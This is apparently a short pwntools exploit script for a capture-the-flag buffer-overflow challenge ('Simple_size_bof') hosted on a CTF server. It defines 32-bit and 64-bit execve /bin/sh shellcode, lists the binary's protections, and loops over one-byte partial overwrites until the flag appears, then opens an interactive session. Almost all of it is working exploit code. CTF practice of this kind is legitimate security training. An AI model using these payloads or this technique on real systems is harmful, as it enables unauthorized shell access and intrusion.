from pwn import *
from Crypto.Util.number import long_to_bytes


# r = process("./Simple_size_bof")


shellcode32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode64 = b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"


'''
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : FULL
'''


for i in range(256, 0, -1):
    r = remote("ctf.j0n9hyun.xyz", 3007)
    payload  = b""
    payload += b"a" * 30
    payload += long_to_bytes(i)
    r.recv()
    r.sendline(payload)
    sleep(1)
    res = r.recv(100)
    print(res)
    print(i)
    if b"}" in res:
        
        r.interactive()









